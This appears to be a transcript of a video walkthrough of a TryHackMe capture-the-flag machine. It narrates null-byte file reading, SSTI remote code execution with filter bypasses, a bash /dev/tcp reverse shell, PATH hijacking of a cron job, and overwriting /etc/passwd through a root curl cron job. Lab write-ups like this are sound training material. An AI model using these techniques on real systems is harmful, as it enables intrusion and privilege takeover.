Hello YouTube, this is Ready Set Exploit, and we're gonna be doing SuperSecretTIp from TryHackMe, which is actually a fun machine that had a lot of little tricky parts, but no part was really that difficult. You just had to have some ingenuity and kind of think outside the box. So we find a web server that you can download some files. We have to bypass this character limit on it, which we could easily do with burp. Then we use a Null-Byte Injection to read files we're not really supposed to, and we get an idea of how the host server operates. We find a password. We also find other endpoints that we can bypass with the given source code. And then we're able to get execution via server-side template injection, which is, as you guessed it, it's built on the title, as the title has SSTI capitalized on it. Once we have access to the server and we see a cron job is being run by another user, that we can do a PATH Hijack on it. And then from that, we can get root access via a misconfiguration using the curl command on another cron job. And the extra bit is some fun XOR encryption. And I'm going to cover how I was able to kind of work through it and keep the very guessing to a minimum and only stick to educated guesses. So without any further delay, let's get started. So let's go ahead and make this. There you go. That should be okay. So first, I'm going to start with an Nmap scan. Nmap min rate 10,000, so we could do like a really fast scan. And our IP address, which is 10.43.108-p-. We can scan all ports. So right away we see port 22 is open and port 777. And let's see, nmap-v-svc to scan for versions and run default scripts on it, -on to save to a file called nmap.txt, our IP address and our two ports, so we could just focus on those. And this can take some time, mainly because of port 777. We'll review this in a bit to see what Nmap shows us, but for now, for the sake of time, I'll go ahead and check out the port. It is a web server, and Nmap does tells us that. Let's see. So we have this site. Not much going on. Check the source. Nothing really stands out. Let's see. Open up console, see if anything that's helpful to us comes out. Oh, there we go. Let's do it that way. Dock to the right. Aha. Anything? Okay. It's a workds server, Python, so it's probably running Flask. See, that's still scanning. It's going to take some time. So it's good to know. That means our endpoint are probably not going to have extensions. So we can definitely look for those. Let's go ahead and run a new, let's see, I need a new terminal. Open terminal. Need a new one. Oh, finally. There we go. It finished. So the reason why it takes so long is Nmap just tried to throw its different scripts at it. It does find some information. So it tells us what we already knew. Worksucks was a Flask server. And it prints out the page a little bit, bad request syntax, so nothing we didn't already know. Port 22 tries to tell us it's an Ubuntu machine. We'll confirm that a bit later. I believe it's actually Debian, but we'll check that later. For now, let's clear Gobuster dir-u. And why is everything capitalized? There we go, dir-u HTTP. I already had it copied. See if it's in user share, wordless, secless, discovery, web directories, web content, directory, list, lowercase, we'll do small. And usually we could save it to an alpha, but shouldn't take too long. I'll close this for now. It finds two of them pretty fast, especially if you're on the attack mode. If you have cloud and debug. So let's see what debug is. Once a debugger, look at the source. And this thing right here, look at the source. That's a password. So we need the password. If we're not sure, we can try it. Wrong password. So not much we can do here. We could try some kind of brute force, but let's check out cloud. We have download my files. If we tried putting characters, we see there's a bit of a limit. 1, 2, 3, 4, 5, 6, 7, no more than 6. Whoops. We could, there's a max length on it. This could be easily bypassed with burp. So let's go ahead and utilize that and see what we can find. There's a couple of files here. Whenever this goes away, I don't need you right now. There we go. So let's see what we can do. Takes a second to start. So we could try some of these files, templates, secret. I believe only. Let's see. I want to intercept. Let's go to history. Let's just enter something. We do that. It. Oh. Okay. Oh, okay. Because I have it selected. So if I select it, it downloads templates. I forgot about that. I think if I do downloads, where did it download? Oh, so okay, so we could read that file. So we can read source code, but let's not do it that way. Let's go here. There we go. I'm gonna turn off burp so it doesn't affect. Okay, there we go. So download templates and download. Didn't. Oh, okay. Does 2 downloads. That's interesting. You only need 1. There we go. So what other files are there? You could try an inclusion. See if that works. No. Okay. Try an app. Usually it's app, could be index, right? But instead of guessing, we could just let something else do the work for us. wfuzz is a great tool for this. So we do copy that. I'll do cloud. I'm gonna do the word list. Same word list. I'm gonna do data because this makes it a post request. Download fuzz.py. And first, I'm gonna get a lot of output. Templates kind of stand up. I'm gonna ignore everything that's 207 characters. So we do --8H207. And as you see, we already knew templates, but we have another one, source. There we go. I like this. That's the source code. I'm gonna copy this. I think that's it. Source.py. Save it. Go to the top. Don't need this. So let's check it out. So there's a file here, SuperSecretTIp.txt. Make a new one. So let's see. I'm gonna read this file. Okay, it's encoded. Knows what that is. But let's keep reviewing the source so we can read that. There's an illegal character check, which Let's see, commas, and so this could be command injection, right? Cloud, that's where we are, get post. So if we just get cloud HTML. So if the download equals source, we get source. If the last four of the file name end with a .txt, we download, right? Assuming it exists. Send, right? Print, send from the root path. So this is interesting right here. So what's the app root path? Does it tell us? No. Okay. So here it adds cloud to it, but here, so if it ends with text, it doesn't add the cloud path and it downloads it. Okay, debug, that's where we wanted to go. So we still need the password request. So the user password is being pulled from somewhere. User not in debug, yeah. Then it does, okay, here it is, some encryption. Encrypted password, debug result. So there's another endpoint called debug result that checks, does an IP check. And then security reasons, templates. This is a big hint to template injection here. Okay. So first, let's see if we can bypass it. The first vulnerability is the last spot is here. It just needs to end with a .text file, right? And so if I do, I don't know, secret, let's see, source.txt, no, .py.txt, it won't work, right? Because it meets that check. It meets this check, but the file doesn't exist. It has to exist, otherwise we get a 404. There is this trick called Null-Byte Injection. Yeah, sure. So Null-Byte Injection, you see, so it's a bypass technique that would be, for sending that will be filtered otherwise. So we add one of these two at the very end. So for example, if an attacker wants to retrieve the file path.ld but an extension .php is appended, we can use a null-byte to hopefully ignore anything after this, even though this is being met. So how do we do that? So let's see if we can, right? Because this still ends in .txt, but the null-byte will make it so that when it makes it pass, so it will make it past this check because it ends in .txt, but then when it gets here, it will ignore the .txt because of the null-byte. And there we go. It works. We got the source code. So now let's go to imports. So this is going to be source. Whenever you're dealing with flat imports, just look at the import file. So this would be import debug, especially if it's custom. These are common libraries. We cannot read these because these are part of like hash lib library will be in user like lib or so for example, if I do locate hash lib.py, see, it will be here. We will need inclusion, direct or directory traversal, but these are custom. IP, debugged, this is Pwn Tools, OS is standard, so we can read, let's see, let's do this, read it, let's read debug, because we want, that's where the password is from, we need that. It's encrypted, so it is import pwn, so it's using an encryption. Let's see, it's encrypting. So okay, so password reads the line here, this thing, and debug, where did it go? Debug, user password does not equal password. Okay, there we go. So it gets the password and it checks. Okay, so it is doing a encryption, an XOR encryption using this key this. That's pretty simple. Let's we could just do it ourselves. Let's see. Do pass decrypt py. Gonna need that. Let's see. Do encoded key. I think it was B. Yeah, it's the author's name. And XOR, it's gonna be blank. We're gonna build on it. So for I in range 0, the length of the encoded text. We're gonna build our XOR. It's a bitwise operation. Character, each character the encoded string, bitwise XOR operation key. I modulo length of the key, and there, and close it, and we print our XOR. Fingers crossed. There we go, and we have a password there. And let's see if that's it. Where were we? Debug. 10. Let's capture this. There we go. That worked. But where does it go? If we were reading the source code. Let's see. So we got debug, right? Debug statement executed. Debug results. We want to go here. That's an IP check though. Right, so let's see what happens if we go to debug result. Debug result. Unauthorized, right? Probably got everything I wanted. So let's see. No, there. That's one. So let's see what happens. So here. Don't need this. Don't need that, but actually I am gonna need that here. So that's our password. So one thing to notice, every time I send it, it gives me a session key. Debug result is based on that session key, but it says we don't 401 unauthorized. So if we remember source code right here, check IP, everything we don't like intruders. Okay, so there is this, which we can now read. Host IP, check IP, X forwarded 4. So it wants this bypass, which is a pretty standard bypass. It's a good way to try to bypass any like localhost restrictions. Won't always work, but in this case, it is set that way. And I put it on the wrong one. So let's do that. There we go. Ah, that looks different. Your does not support. That's funny. So let's see. Where it go? 10 out of 10. There it is. What I'm gonna do is here. Put that there. Auto scroll. Nice. And here, what I'm gonna do is, we already had a pretty good hint at. We know it's Flash, and there is a template. It did mention something about security when it loads the page, right? Debug result, render template, debug result. Right, so here, so there's probably some kind of SSTI. Even if we're not sure, we can try it. Let's see. 7. It's a standard SSTI. Copy that. It's kind of tedious, but it's not too bad. You could script it. 49. So that is, have you noticed before it was just 10 out of 10 times 10? It didn't show 100, but now we have template injection because multiplied it. So if you're not sure what I did, You could go payload all the things SSTI. And the name of the machine is SuperSecretTIp, and there's SSTI on it. So kind of funny how that works. Let's see. We want not, is it Ginger? No, it's Flask. Let's just go there. So actually, yeah. So there it is. So this is the one I tried, right? All we could do is Ginger. Let's see, remote code execution. We could try this one. There was an illegal character, so this is probably what it was talking about. But let's give it a shot. Right there. I'm going to do that. I'm going to do this. And that looks different. I didn't get a session key. Illegal characters found. Well, there it is. That is that's where that bypass comes into play, which, if we remember, is single quotes and this semicolons, parentheses. That's okay. If you scroll down a bit more, there's plenty of bypasses, filter bypasses, right? This one is pretty good. It bypasses most things. This one does have a single quote, but that's okay. We can just replace it. CyberChef. That's one way to do it. Let's see. It's taking too long. There we go. So you do find and replace. So I'm gonna do comma with, single quote with double quote. Let's check it out. Here. There. Look at that, perfect. So ID command. Oh, we got a session ID. It's perfect. So that looks like it went through. There we go. We got execution. And let's see. Now we just need a reverse shell. Let's do it. Okay. I want to make this easy for me. I'll do nclvmp 9001. Make this nice and easy. Don't need this. Don't need this. Bash dash c bash dash I double space dev tcp my IP address 9001 double space again. Typically you don't need the double space, but I want to make it URL safe. So there. You see there was a plus sign. I don't want plus signs. So this is good. See, if I don't put one here, it adds a plus sign there. So there we go. So let's try this. Go back. Right here. Echo. I don't know if this will work because there's a percentage sign and a percentage sign is block. So yes, as you can see here, the percentage sign is not gonna work. So well, let's do pluses. Maybe that'll work. Plus. So that's the reverse shell. That's base 64 plus dash D. Otherwise, I'll try something else. I think I have an idea. See, so it's decoded, and then I'm gonna run that. All right. Let's see if I crush this thing. It's hanging. That's always a good sign. We got a shell. Python 3-c import pty pty.spawn bin bash, and I control C it, t put lines, t put calls, STY raw dash echo, press enter twice, STTY rows 33, columns 165, export term, and this is so I can clear. There we go. Nice. And just look, that's all the files we had anyway. So we essentially read everything we needed. So let's see what else we can find, right? How many users do we have? That's always a good check. So we're currently the AHAM user. There's F30. Can we read files? We can. Oh, one interesting thing. We can write on the .profile. This is not by default. No one should be able to write on your profile. Except you. See? But this is world readable. So this means the UID, the group ID, and then the remainder, world readable, world writable. So this is world writable, which means we can edit this. Why? So that's an oddity. So that should point to the next place. We could look at cron tabs. A lot of cron tabs won't be on here. Sometimes they might be. Not sure if I remember and I get rook, sure where else will cron tab where I would usually put them. But we have two cron tabs here. One for the root user, and we can already see that's where we have to get to, right? Bash lc cat, so that's odd. Path, they both don't have the path set, but it reads off of here. So let's see. So we build a story kind of. Root does this check, and then probably this reads the file. LC, that's interesting. What is that? Man bash. Aha. Don't need this anymore. Don't need this anymore. Might need. No, I don't need it anymore. Sure. Okay. LC, make back ash as if it had been invoked as a login shell. C just reads it as a string, starting with, okay. C invocation. So this is interesting. That means it's being invoked as if the user, so instead of just running the command, it's acting as if the user has logged in. So when bash is invoked as an interactive login shell with the login or -l option, it executes the command from the etc profile if the file exists. After reading that file, it looks for the bash profile, login, .profile in that order, and executes commands from in the readable. Okay. So this is a path execution. I believe Hacktricks has something on this too. Path. Let's see. Let's check here. But I'll show you. So path. PATH Hijack. Oh, it's not loading yet. Is there another one? There's pseudo execution bypassing. It's even easier. I thought there had one. Pseudo. Okay. I guess it's not here, but essentially, because so if we read home F30.profile, the user is logging in, right, and running this command. And I'll explain why there's a weakness here. It looks to see the path. And if you're not familiar with the path, both Linux and Windows have a path. That's the path where the system looks to see where this command, the command you're executing, is located. So if I want to use the cat command, as you could see, it goes through here first, then here, then here, then here, then here, until it finds it. In this case, it's here. So the cat command is here. If it will execute it in that order. So if I can edit this file and have it point to a path that I control, because we can edit the path. This is a global variable. We can change it. if I can have it point to a custom cat command, then it'll execute my cat command and not the standard one. If this had bin cat over it, unless I had write access to bin, it wouldn't work. And it's easier if I show it. So actually it's a lot easier if I show it like this. Let's see, let me do another terminal. So the which cat, bin cat, right? So let's do export path. I'm gonna change the path here. So now if I do path, it's going to look at my current directory first. You could set any directory you want. But now I'm going to create touch cat. I'm going to make it executable. And I'm going to check again which cat. And now it tells me that this cat is here. I'm going to leave this directory. I'm now somewhere else. Which cat? It points back to bin cat. Because it didn't find it here. It kept looking through it. It found it here. Okay, so that is how we're going to perform this PATH hijacking. So first thing I'm going to do is I'm going to build a malicious one. Nano is not installed. I mean VI. Nano is installed. I hate Nano. It's the worst. Bash dash I dash C bash dash I knew I should have saved it. I CP not there. Control X. Yes. Okay. We need to make it executable. Hmod cat. Let's go to that directory. And now we're going to make this a little bit bigger. Should work. There you go. CLVMP 9001. Alright. So we made it executable. Now we're gonna edit our. So we just have to follow the same format. Path equals double quotes temp path. Still want other commands to work. Control X, Control Y, profile. And now that should work. So when let's see cat, let's see cron tab. Hope I didn't mess this up. So it has, so when the user logs in or runs this command as a login shell, it's going to execute cat. And because at the end of this file, I have set the path to look for any command starting with temp. It's, oh, it already happened. That's nice. Does it have my, no, I don't. Okay. So Python 3, that's C, import pty.spawn. So as you kind of saw, it executed my cat command and not the standard one. Tput lines. This is so that when I get the reverse shell, it wraps around a lot better. STTY raw dash echo FG, press enter twice. ST rows 38, columns 162. Export term equals X term. There we go. I wanna establish some persistence. Hopefully this works. Because I lose this shell. Also, look. See? TMP. So what we want to do here is move cat to cat 2. Because otherwise, if I try to use the cat command, it's going to use this one and I won't be able to use it. So if I do it again, see? Now it's the standard one. So I'm going to use SSH keygen ID RSA. Yes. Cat ID RSA.pub authorize. I am such a bad speller. Keys. There. Make sure I still have good time in this machine. I do. It's nice. And copy this. And let me start a new one. There we go. Hope it works. ID RSA. Copy. Save. Hmod 600. Oops. Give it the appropriate permissions. F30s at 10.10.43.108. Yes. Oh, it didn't work. That's my username, right? F30s. F30s, yeah. And authorized keys, it's there. Let's see, copied it correctly. F30s, yeah, I think I got it. No? Alright, well, it doesn't matter. I'm not gonna obsess over it. So, let's see. We're now this user. What else can we do? What's the next step? Right? Oh, we remember there was a let's see, site check and health check. What's health check? Health check, okay. What is site check? It's an URL, okay. Let's go back here. You may have noticed, right? You may have noticed there's a k-k here with the curl command. Let's see what that is. Match case. Config file. So specify which config file to read curl arguments from. So it does arguments. So URL, okay. Example. Oh, okay. So it reads. Let's see. It reads this. Oh, not the one I want. There we go. So it reads this URL and then it saves it. So it's just doing a curl command. Output. So we can save our file. We could set the user agent. We could do a lot of things. So essentially, where'd it go? So essentially, if we can curl any page, we can rewrite it on the system. This is running as root, right? Yes, it's running as root. So we could just overwrite whatever file. We could point it to ourselves. So let's do this. What I'm gonna do is shadow password generate. This one right here. Old reliable from 10 years ago. How to manually generate a password. I'm gonna show you. So what I'm gonna do is I'm going to edit the passability file and insert a user of my own. And password. There we go. But the user is going to have root privileges. Copy. Pass WD. And I'm going to copy that. Let's see, we move that so you could see a little bit better. RSC. And I'm going to copy that and insert it here. There we go. Perfect. And now I'm going to listen. HTTP server 1337. Yep. And now I'm going to do nano as a site check. So I'm gonna do output. Oh, let me not do that yet. See 10.10.143.aa.pathwd 1337 output etc pathwd, and in a second, in about a minute, it's going to read, it's gonna curl my IP, my port here. It's gonna curl this file and it's gonna save the output to etc pathwd, and we should be able to just elevate our privileges to that user, assuming we did everything correctly, right? So, and then comes the fun part, the really fun part. Should take about a minute or so. So far, really fun machine. You know, lots of exploitation steps, but as you see, nothing too complicated. Oh, we got a hit. There it is. SURSE password. We're the root user. Very nice. But we're not done yet. Could kill that. We have 2 files. Flag 2. Secret. So more encoding. If you look at the way it's encoded, this is most likely XOR. And secret probably can decode this first. It's very small, and this probably serves as the key to this, right? And funny thing is, if you did the proper enumeration, you also would have found this very odd file that you typically wouldn't find. And it talks about, you know, a couple of things, and I was missing 2, but I'm gonna take a different approach to this. And let's see. There we go. What I'm going to do, I'm going to brute force that secret. Okay. Couple of different ways. Well, actually, just one real way. So, just about the approach that you take. So I'm going to do user share wordless. Wordless rock-you. I'm gonna save it to a file called path.txt. Rock-you has some funny characters, so I use strings to overcome what I'm gonna do next. So first I'm gonna do brute. So I'm gonna do b this right here. So the thing with XOR is that you brute force it, right? It's just one key. It's not like it's AES where you have to brute force, and that would be impossible, or very, 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 very tough. Gonna read everything for I in passes, try XOR. So start with a blank XOR. Key is gonna be I.strip. We're gonna strip any empty spaces. So for J in range, so this is where the XOR comes in. Gonna XOR character, so our original text, XOR operation order, key J percentage, the length of the key, there, and if the XOR is alphanumeric, or the XOR is a digit, this is just to eliminate any bad characters, because it has to be maybe something that makes sense, right? Like a standard password for easy to remember. So if it's any of those 3, it's gonna print me key or the XOR. I was just gonna do an accept, but let's see what happens if I just do it this way. Point down 3. And I messed that up, but that's okay. Quick fix. There we go. Oh, okay. So something wrong here. But right away we have 2 results. First thing to notice is it repeats after 4 characters. So we can sort of guess that the key is most likely 4-character long key, which makes sense with the length of the encoded text, right? But both of these have a repeating OOT. Okay, so that's something to keep in mind. But let's fix this. Try accept that, and when that happens, I'm just going to continue. So it just continues throughout the loop. And there we go. Look, okay. So lots of different things, but we could definitely see a pattern here. Okay, OT, TOT. So it seems to repeat. So it's always a character, a length of 8, but some of these have only 4, and the X is odd because it's all numbers, and then it's 2 X's. This one right here is just 4, so it stops right at the 4 OOT. So you can start kind of seeing, okay, OOT is the recurring theme and the first letter is different. So, I mean, that should kind of scream at what the answer is. We could take a guess that the key is root. But if we look at any 4 characters, right? User, share, wordless, rock you. And they end in OOT. There's really not that many. 11, right? There's 11 we can cycle through, and we can do, right? Roots and brutes. And I'm just gonna do this. There you go. Much easier. So I get a match for only 4. And out of the 4, I mean, this is the one that makes the most sense, right? If we're looking back at the big hint, it's always about root. So you could have gotten it from the hint here, or that was just a way to deduce it to just 4 different results with, you know, and that's a lot less to try. So let's see, how can we, so we got the key, right? But this is odd, right? They all end with 2 X's, so maybe like we don't fully have it, but let's see. Let's see. I'm gonna guess this now. So guess flag. There we go. And I mean, the funny thing is we could cycle through these. And we could try each one to see which one gives us the better result, right? But let's stick with root. Why not? It's the one that makes the most sense. Key. There you go. XOR. C4. I don't know. I in range. 0 length of B. Yeah. XOR. Kind of already know what to do. B. Let's see. That's okay. Key. I modulo length of the key. So what happens when we get this? I'm gonna do a little bit different here. I think is cut 1 to 10. Okay, I don't want to reveal it. So right here, did I copy the right one? You know, the thing with the, okay, key, yeah, 9. Okay, so if you're wondering what this is, it's just the attack box weird character encoding, but our key is not complete, right? We're getting some text, but this is probably cronjob or cronjobs, right? So this is where the fun begins. So now we're gonna copy guess flag to correct flag. And this is again just a little bit of having to guess. So let's see. We're gonna do secret, right? And we're gonna do, so we're gonna brute force these last two, right? It's, if we follow the scheme, it's only digits. So we just have to brute force it, probably digits, but we're gonna try every single character. Key 1, user, share, wordless, secless, fuzzing, alnum, case. TR, delimiter. Yeah, there we go. I need these. So let's see, I'm gonna need that at some point. Call it alpha. There. So my key 1 is gonna be secret. Gonna replace the 2 X's. Place it there. Let's see, final, that's gonna be my final flag, which I'm gonna have to cut. There we go. So let's see, let me not lose track here. So for, it's gonna be a couple of loops for J in range, length B, let me just do J, and then another loop for K in range 0, length alpha. This is alpha. So we're going through each iteration of the loop. So 0, starting with 0, and then 0, 1, 2, 3, 4, 5, then 1, 0, all the way, right? That's what this loop is doing. And now we're gonna do the key. My key is gonna be key 1, so just these numbers, and I'm gonna add alpha J plus the character. So it's gonna iterate through each one, right? And every time it does that, I'm gonna start with an empty flag. You know, I don't even think I need a flag up here, the final here. But actually I do. No, I don't. And now it begins the XOR operation for I 0, the length of the flag. Let's see. Which is actually here. This is my XOR operation. Let's fix this up. Flag, that's my XOR. Already had it there, that's okay. Now it's gonna be, oh no, this is final flag I, key I, length of key, yeah. Here we go. And if my, let's try with cronjob. in final, we're gonna start again. We're gonna print the key, and then for I, so if there is a cron job in the text, right, because it's gonna cycle through a lot, we're gonna do another XOR, length of the flag. So another XOR, flag, I, XOR bit, key, I, modulo, key, there. Print it and break out of that one and start again. See how that goes. Correct flag, cut, don't want to show it all. Boom. So that didn't work. See what I missed. Let's try cronjobs. So it not cronjob, although cronjob is in there, but there is our key, right? So those were the last digits, but there is the file. There is the flag. I don't want to expose the whole flag, but essentially, as you saw, we just kept adding every letter there, and then we would XOR it it wasn't always going to give us the correct result, right? It was going to give us a bunch of incorrect results. But if the cronjob word was in that like garble of text, then we XOR'd with that key, because that's what we needed, right? And we'd XOR with that final key and see what that result was. I don't know if that last for loop was necessary, but I'm no expert coding. But that's pretty much the room. So lots of fun. I really enjoyed the XOR encryption bit. To show that although XOR relies on a key, the bitwise nature of it can make it inherently weak. If that first secret was actually had a stronger password besides root, that could have been very tough to decode, right? When that was the first thing. But everything else just came down to having ingenuity. As you can see, a lot of it wasn't very tough. You just kind of had to know how to approach it correctly. But that's it. Feel free to comment, like, or subscribe, and see you all next time.